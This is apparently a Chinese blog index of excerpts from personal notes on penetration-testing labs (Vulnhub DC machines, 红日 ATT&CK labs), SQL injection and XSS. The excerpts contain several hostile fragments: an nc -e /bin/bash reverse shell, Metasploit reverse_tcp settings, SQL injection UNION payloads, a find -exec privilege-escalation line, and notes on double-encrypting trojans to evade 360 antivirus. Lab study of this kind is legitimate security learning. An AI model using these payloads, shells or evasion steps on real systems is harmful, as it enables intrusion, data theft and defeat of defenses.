- 博客(51)
- 收藏
- 关注
原创 (个人学习之计算机网络知识总结)
备注:本人写这个计算机网络的知识点只是用于个人学习。TCP/IP协议从字面意义上讲,有人可能会认为 TCP/IP 是指 TCP 和 IP 两种协议。实际生活当中有时也确实就是指这两种协议。然而在很多情况下,它只是利用 IP 进行通信时所必须用到的协议群的统称。具体来说,IP 或 ICMP、TCP 或 UDP、TELNET 或 FTP、以及 HTTP 等都属于 TCP/IP 协议。他们与 TCP 或 IP 的关系紧密,是互联网必不可少的组成部分。
2024-02-19 13:57:34
865
原创 基于SQL注入漏洞的总结与归纳(个人学习 整理归纳复习
SQL注入常见的web漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。像这样我们输入?id=1 我们可以获得id=1的信息 这就是sql注入漏洞,可以通过sql的命令行去后台直接查询信息第二节 SQL注入的产生原因原因:在前后端数据的交互中,前端的数据传到后台处理时,没有做严格的判断,导致其传入的数据拼接到SQL语句中,被当成SQL语句的一部分执行,从而导致数据库受损,信息丢失。
2024-01-25 15:41:59
1444
1
原创 红日靶场2打点记录
中间发生了令我匪夷所思的事情,就是CS工具和WEB靶机及竟然崩掉了,害的我重装了CS和MSF工具,不过现在已经解决了问题,如图所示,我们可以看到内网的网关是10.10.10.1 于是我们可以看到内网的网址基本是在10.10.10.1之间的的。(之前有360的时候一直提权不成功)这里我先关掉360做一个对照组,这里先体验一下无360的环境。因为之前成功用冰蝎免杀360,把权限反弹到了MSF上,然后MSF把权限反弹到CS上。并不是每次连接,MSF一定会连接成功,连接失败的华为,就多跑几次。
2024-01-22 14:05:43
451
原创 红日靶场2 ATT&&CK攻击
首先最重要的是 你要用免杀脚本对你所生成的木马病毒进行加密 然后加密系统的内核,就是上一篇文章所提及的 是通过两次加密之后 所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会被360工具发现,因为冰蝎的代码自带免杀效果,是因为我的kali机器又崩溃了,找到的原因是因为kali因为神奇的原因没有分配IP地址,输入 declient -v来让kali自动获取ip地址,然后发现 ,通了,原来是kali机器自己的问题,冰蝎因为其特殊的构型,有免杀的效果,
2024-01-17 16:07:40
558
原创 红日靶场II 打靶练习 个人学习
环境配置WEB主机 在配置的时候赔了半天也连不上网 然后我选择了自动配置IP地址 然后我们就连接成功这是在是太离谱了 不过好在我们是连接上了 然后我们看到我们这个web的地址是web(外网:192.168.52.144 内网地址是 10.10.10.10)如图所示 外网IP地址为 192.168.52.145内网地址为 10.10.10.201首先我们先启动在web服务器上的网页登陆文件登陆的时候首先要进入管理员模式哦然后外网服务器的地址是192.168.52.145。
2024-01-17 10:33:47
493
原创 红日靶场2 指免杀360 个人学习记录
闲话少说,先说明一下 这个免杀工具是需要go语言的 使用前应下载go语言的配置环境 配置完了以后 里面有个文件夹 会告诉你使用的步骤 基本上就是你把那个恶意代码 放到他们的代码里 用编译器打开 然后跑,经过两次的加密之后,360安全卫士就无法判定你病毒的存在了,就可以通过工具上传到你所需要注入的主机里面 但是这里初了一些小问题 就是我这个工具和我所生成的病毒不兼容 这就很离谱。我首先要承认,微软自带的病毒免杀确实有一些抽象,因为总是把我的病毒后门给我杀了,然后我一点他那个安全中心就死机,气死我了。
2024-01-15 18:34:55
538
原创 红日靶场之sta&&ck远程桌面控制 个人学习)
set payload windows/meterpreter/reverse_tcp 这是利用漏洞tcp回弹模块。set lhost 192.168.52.129 这是设置回弹的主机 这里是我们的kali攻击机的ip地址。然后我们还需要进入 vi etc/proxychains4.conf。我们要先输入 getuid 是查看服务器的权限。让我们开启3389端口以便于进行远程连接。我们首先先对内网的用户的主机进行扫描。然后就可以进行远程的计算机连接了。然后我们打开MSF工具进行监听。
2024-01-09 11:09:50
518
原创 我是内网灵活的狗之渗透之红日靶场 sta&&ck之用户域渗透
看见445端接口开着,所以我们尝试连接445 的漏洞。用永恒之蓝漏洞连接后,尝试用这个漏洞,添加新的用户。因为对所有的端口进行扫描的话 会导致扫描时间过长。我们现在准备对域内的用户靶机进行一下扫描。我们这里只对部分重要端口进行扫描。然后我们要给这个用户管理员的权限。给我们的新建用户增加管理员权限。
2024-01-08 16:06:58
395
原创 我是内网灵活的狗之sta&&ck靶场1
需要在webshell终端将目标文件夹转到c盘 的phpstduy/www/文件夹之下,才能选择的620.exe,检测到内网的192.168.52.138的开放端口,发现端口有四个开放的,我们现在进入另一个内网地址看一看。因为这个141的机器的开放端口有445,我们可以尝试用经典漏洞ms17_010尝试内部夺权。然后我们另一种方法 我们首先输入 getuid确认我们当前的账号的一些信息。我们先启动这个在win7上面的php工具,也就是启动php服务。然后我们就获得了其他权限的用户的一些信息。
2024-01-08 15:01:33
416
原创 红日靶场第一关stac&&k靶场
首先我们先使用msfvenom工具生成一个用于windows的木马后台文件,然后我们将生成的木马文件名字叫做620.exe。安装黑客后台工具,使用cs工具 也就是cobaltstrike工具。然后我们要使用msfconsole工具监听咱们的木马后门。然后从上图我们可以知道 存在org域。用蚁剑开启我们所设置的木马后台文件。启动成功了,怎么没有进入App啊?看一下是不是存在域 之类的东西。发现我们是普通用户的权限。让我们在这里建立一个后门。如图所示确实存在org域。在这里有一个god域。
2024-01-05 17:54:04
481
原创 红日靶场第一关 att&&ck
目前我们的想法是把病毒上传到网页当中,所以我们应该找个文件注入点。现在我们进入日志文件里面 ,希望能向日志文件里面写入shell。通过下在到扫描的文件使我们找到了 另一个备用网站 我们去看一眼。然后我们可以通过之前下载的rar文件确定写入的木马所在的位置。说明这里不能写入shell,我们可能需要其他的办法。让我们查看一下安全文件夹里面的内容,发现啥也么有。将日志系统代开 这样我们就可以进行日志的查询了。我们在这里发现前台的文件能够可以上传php文件。但是再次之前 我们需要找到网页的绝对路径。
2024-01-04 17:58:36
460
原创 DC9的通关教程 个人学习
在网页的后面的链接的。PHP文件不一样,可以搜索的东西不一样,比如这次我输入的是result.php这文件才能被扫描出东西。根据我40分钟的扫描,我对于sqlmap工具的使用有了新的理解。我们通过漏洞扫描工具 发现这个DC9有很严重的SQL注入漏洞。这里有文件不存在的报错,让我们尝试是不是存在文件包含漏洞。注意,给出的密码为MD5加密的,解密以后进行输入。进行查看,发现test文件是一个python文件。爆破了一小时,竟然不成功?我们来观察一下DC9的网页 如图。我们发现了他打开的端口号。
2024-01-03 17:46:11
728
原创 关于DC8用MSF进行反向链接的一些说明
输入方式为为 /tmp wget http:、、192.168.52.129:80、46996.sh。然后将这个代码复制到网页上传点的的时候休要注意可以上传的是不是PHP的代码。注意这个生成的后门我们的lhost地址是我们kali攻击机的地址,上星期五的时候得了甲流,关于MSF反向链接的地方没有写明白。这时候我们在kali攻击机上启动一个临时的http链接窗口。然后指定的链接lhost地址也是kall攻击机的地址。当时我们用msfvenom生成了反向链接的代码。然后进入msf进行连接的时候。
2024-01-02 13:59:54
518
原创 基于vulnhub靶场的DC8的通关流程 (个人记录)
用常用的工具nmap扫描192.168.52.142,观察其开放的端口号。我们发现这里可以发现能够上传文本,我们可以使用脚本来反射webshell。明明操作的都没问题,不知道跑为什么一直连接不上,所以我们换一种用法。发现问好后面的数字会随着点击东西的不同而进行变化。扫描出来的账户名是admin 密码是经过加密的。我们现在用MSF去链接paylopad的链接。扫出来的东西,你瞧见每,发现有user的表。可以尝试我们用之前得到的密码和账号进行登陆。我们用sqlmap扫描扫出来的数据库。
2023-12-29 15:07:21
464
原创 个人学习之DC7靶场的实践
这里是一个升级的板块,我们可以发现这里其实 是一个功能扩展的地方,我们可以在这里升级,将其扩展为一个多功能的上传工具 便于我们将一句话木马上传 上去。所以得出一个结论,就是在输入php吃的时候 在进行一句话木马编写的时候。这下我们可以添加一句话木马,然后用webshell工具进行连接了,才会连接成功 而且这里u一定不过要选择的是php连接文件。找到webshell连接工具 准备连接我们的一句话木马。一定要确保一句话木马的格式是正确的。我们发信这里有个可以扩展的地方。我们可以输入这个,就是升级的包。
2023-12-28 13:15:24
596
原创 DC7靶场的攻击流程
这个靶场太离谱了 竟然ssh密码是用爆破出来的 部队这个号的没密码是使用搜索引擎搜索出来的。有可以注入的地方,首先我们可以考虑一下手机是不是有数据库注入的漏洞。所以我们用sqlmap进行sql漏洞的扫喵 所以我们所使用的。他的属主是root 但是所有人是普通用户。想要调用kali下面的a.sh的木马文件。密码修改成功 我们可以进行下一步操作。找到关于这个组件的漏洞进行攻击。发现用户是dc7user。让我们看一下都有扫描服务。进入了dc7的用户界面。退出当前用户用户的输入。是按住ctrl加上C。
2023-12-27 18:00:59
374
原创 dc6b靶机个人练习
所以我们需要注意如果你带着要复制的文本建议先复制到文本里面,然后再复制到vim的文本里面。需要注意的是我们在使用这个的时候 一定要在ip地址后面写上网页的名称 才能找到网页。扫描的时候格式如上图 wpscan --url 写上网址和和密码本 就可以扫描成功。注意在爆破密码的时候,密码本不要写路径 有个啥DER黑客写路径了害的我爆破了半天。首先我们要知道一个问题,就是在kali系统里面,自动填充实际上是将信息复制了过来。然后的登陆方法,切记是用ssh连接端口号进行登录。有一条执行代码,是为了反弹代码的东西。
2023-12-27 14:06:34
415
原创 vulnhub一句话木马 DC5个人学习记录
夺取了root权限 在使用pduo夺权的时候一定要确定都。用nc反弹连接发现没有端口开放 发现没有开放的原因 是因为在反向链接的时候发现没有写端口号。serbice apache2 status 是查看当前的服务器状态。虽然没有找到目录中的吗麽,但是我们已经成功将一句话木马写进去了。让我们来监听1234端口,看看哪个倒霉蛋把1234端口打开了。发现xxoo后面的一句话木马不见了,说明http成功了。进入了虚拟终端,但不是真正的bash。从官网下载了的安装包,发现能够解压。我们看到了对面电脑里的文件。
2023-12-25 11:09:10
70
原创 个人靶机练习DC5实战
也可以用bp的int爆破板块去寻找 只要在 cmd 种加个符号 然后用 common.txt文本扫描 就可以找到file。今天换了一个扫描工具 u用的netdiscover 后扫描各个网段,发现存在的主机ip是。目前我们看到的是 只有111端口和80端口,可根据教程显示应该还有其他的端口。用dirb直接扫描文件的连接发现没有什么有用的东西。我们用wfuzz来扫描目录知道file是用来查询的。首先我们应该知道的是 这个命令中的X都需要大写。用dirb工具扫描存在的php的文件。将密码什么的爆破了出来。
2023-12-21 17:26:02
61
原创 DC4打靶个人练习
由此可知,当我们把用户转到clarles时发现他知识只是一个普通的权限,我们想要得到管理员的权限,所以我们应该切换到管理员权限才能进行进行下一步的操作,我们可以直接在本界面通过su 名字来切换账号 比如我们第一个账号,并没有管理权限。登录成功,首先我们需要明白一点,就是切换账号不需要去另一个命令行界面。我们发现了一个右键,发现了邮件里有一个密码,由此观之,我们应该用teehee的提权的方法。我们只能过su命令来切换账户的用户,让我们来切换到jim的文件夹里面。我们获得了另一个账号的账号和密码。
2023-12-21 13:37:40
37
原创 网络攻防个人学习之DC4
修改包职业哥 raio后面的位置应该是kali攻击机的ip地址 不是回显机器的地址 你个笨蛋 然后连接端口是9999。radio=nc -e /bin/bash 192.168.52.137命令行。发现是80端口为网页端口 22端口为远程连接端口。进行细致的扫描,扫描到了端口的使用中间件的版本。应该没有问题的,因为输入whoami有回显。将登陆界面的包抓到,尝试若密码爆破。于是我们可以发现靶机地址为DC4。这有监听的回显,说明应该成功了。将发送的数据命令改为回显命令。感觉细致的扫描都差不多。
2023-12-20 16:17:09
81
原创 渗透测试之vulnhub靶机
说明:在局域网内,无论采用哪一种选项,Nmap都是通过ARP包来询问IP地址上的主机是否活动的,如果收到ARP回复包,那么说明主机在线。发现端口开着80 但是不能访问到 原因需要修改hosts文件。用nmap -sP -T4 192.168.52.0/24。用arp-scan -l来扫描主机,但是没有发现目标ip。扫出来ip地址为192.168.52.132。发现了问题是没有给靶机设置net网络连接。目标:扫描局域网内哪些IP的主机在线。
2023-12-20 10:02:34
103
原创 关于linux基础知识的复习
昨日关机kali攻击机以后,今天重新打开发现无法连上网络输入该命令输入完以后,发现KALI机器重更新连上网了现在我们要给KALI攻击机安装中文的打字系统。
2023-12-19 15:03:58
37
原创 基于DC 3 关于冰蝎websell工具的使用
不得不说 在安装黑客软件的方面 寻找好的路径真是十分的省力气,一开始我打算在本机的桌面上安装兵蝎webshell的工具,发现windows自带的这个B 病毒防御系统,我下一个他发给我删一个,后面嫌弃win10安装太麻烦,于是转kali上。这个链接的安装过程非常详细,可以按照这个来。创建一个php的木马文件。将黑客的脚本保存在里面。我们可以新建一个文件。调用tcp连接的病毒。
2023-12-18 08:45:17
61
原创 渗透测试靶机 DC3 个人练习
根据网上搜索到的信息joomla是一款知名的内容管理软件 是由PHP前端和mysql组成,所以我们可以寻找它是不是含有sql注入漏洞。其中 --risk=Risk 的意思是指定风险的级别,默认为1,数值越大,攻击者被发现的风险越高。将漏洞编号复制过来哦 复制时 set mouse = v 这是复制命令,试了一下午发现所有的都安装了,但还是不知道是吗原因导致的安装失败。注意:arpscan -l 命令是扫描当前网段中所有的主机。--level=Level 执行测试的级别,默认为1,
2023-12-15 14:13:35
47
原创 DC-2 靶机的个人练习
rbash,即受限制的 bash,其可以用作中转服务器(实际上rbash只是bash的一个软链接它与一般shell的区别在于会限制一些行为,让一些命令无法执行。绕过shell就是建立了一个名为tom的新权限 并将其倒回原来的路径注意 输入set shell =/bin/sh时后面不要加入/////否则会报错重定向成功切换jerry用户从tom权限进入了jerry先退出jerry里的tom文件夹退到上一层输入ls 显示用户发现有jerry和tom切换到jerry的目录下夺得权限。
2023-12-13 13:51:43
76
原创 DC2靶机渗透 个人学习记录
cewl加上网页链接 比如说 cewl http://dc-2 是指根据这个网页链接来进行深度的爬取,通过url链接和爬取来获取一个密码本。或者为了我们的以后方便的保存 我们会使用命令 cewl http://dc-2 passwd.txt 该命令是指将密码本保存在 txt上。进入了编辑模式,但是打不出字来,发现需要按I进入编辑模式才能继续编辑,添加新的网址,发现需要按i才能进入编辑模式 所以我们需要熟悉并掌握KALI中的vim命令,通过代码 wps --url http://dc-2/ -e。
2023-12-12 17:56:45
52
原创 XSS个人学习 之网页篡改
注意如果想要输入的xss语句成功反弹到beef-xss上就必须在kali的攻击机上的浏览器访问八个页面进行语句的插入。由此可知 kali机器的ip地址是192.168.56.129。输入要克隆的站点地址 如图所示是一个 我们教学的地址。现在我们将链接修改一下,看是否会成功,发现不能输入了 去控制台更改编写的长度。用beef-xss生成恶意的链接。如图所示,我们的替换取得了成功。setroolkit伪造网站。我们看到了用户的账户和密码。这是XSS篡改链接的代码。启动setrookit。
2023-12-08 17:17:10
355
原创 基于XSS漏洞的个人学习
当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有xss代码的数据发送给目标用户的浏览器,浏览器解析这段带有xss代码的恶意脚本后,就会触发xss漏洞。定义:存储型XSS是持久性跨站脚本,持久性体现在xss代码不是在某个参数(变量)中,而是写进数据库或文件等可以永久保存数据的介质中。用户最简单的动作就是使用浏览器上网,并且浏览器中有javascript解释器,可以解析javascript,然后浏览器不会判断代码是否恶意,也就是说xss的对象是用户的浏览器。XSS篡改链接的代码。
2023-12-08 13:36:57
44
原创 kali中linux命令练习---个人练习
tar -cvf 打包文件.tar 被打包的文件/路径...touch 当文件不存在时会自动创建一个这样的文件。用 ctrl+shift++可以扩大界面的大小。用find 加文件名 是查找当前文件夹里的文件。在输入路径时 、home按住tab会自动补全。tar -xvf 打包文件.tar。cd ..两个点才是返回上一级目录。tree -d是以树状图的形式来。mkdir 是新建一个文件夹。cat 是看文件的内容。
2023-12-08 10:21:17
110
原创 sqli关卡通关
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'security'#爆库。由此可知我们的登陆界面 是用户名=‘ ’ 密码= ‘ ’ 这个形式的。输入1' union select database(),version()#当输入1’时 回显报错了 根据回显可知。报错了,很奇怪,这是为什么呢?我们输入1 1’ 1'--+
2023-12-07 17:18:41
36
原创 靶场DC1过程总结
所以这里的提权语句是 find / -name corn.php -exec "/bin/sh"\是找到名字为 corn.php的文件然后获取他的root权限。SUID提权的思路就是运行root用户所拥有的SUID的文件,当其他用户运行该文件的时候就得获得root用户的身份。其实已经连接到use的数据库了 只是还是显示mysql。使用find命令查看拥有suid权限的文件。root用户是指唯一的超级用户。这是python提权的常见姿势。输入 showtables;find获得权限的笔记。
2023-12-07 11:17:40
75
原创 vulnhub打靶 DC-1
跟据我的扫描 发现UDP开的端口有三个 但是除了68 感觉没什么可以用的。用nmap的tcp扫描 发现有三个端口 yttp网页和远程连接的ssh。用nmap漏扫工具包进行扫描 发现只有两个端口,并没有扫描漏洞。用arpscan扫描出了三个主机IP但均不是我们的目标靶机。因为我们的权限只是一个低权限的 www-date是低权限的。用网页登录192.168.52.130发现该网页。启动了msf 首先我们要做的是检查数据库完整性。用那个插件可以看到网站的编程语言的版本,用nmap扫前20的udp的端口。
2023-12-06 15:01:44
62
原创 sqli打靶练习 sqli-less-3
由此可见 当1=2时他竟然没有报错,由此可见,其为字符型sql注入。id=1时,页面回显如图。发现此数据库的闭合方式为’)
2023-12-06 10:27:44
39
原创 SQL注入 实训之 sqli靶场
id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'可以爆出security表中东。id=2 and 1=2后虽然没有报错信息但是没有回显 所以目前我们假定他是一个字符型注入。id=-1 union select 1,database(),version()id=1 and 1=1 发现界面与原来一摸一样。
2023-12-06 09:47:01
84
原创 vulmhub 打靶联系 之 渗透进入me and my girlfriend 靶机
在这个地方加入一条规则,增加一个请求头,将所有的http请求到的包都用x-forward-for来代替。发现x-forwarded-forlocalhost中的forward需要加上ed。由此可知我们已经控制了对方的电脑 我们显示我们的IP是192.168.56.130。通过gobuster的扫描,发现没有任何有价值的目标,经过文件扫描,发现了一个叫robot的txt的文件夹,发现是因为for后面的local前面有一个:没有加上。由此可知 我们需要继续攻击以便寻找的。将id改为1发现跳转到id是1的界面。
2023-12-05 15:05:01
69
空空如也
用TWO Bone ik constraint设置了target就会导致手臂扭曲在身体里
2023-08-13
unity3d使用Ainmation Rigging时没反应!
2023-08-12
TA创建的收藏夹 TA关注的收藏夹
TA关注的人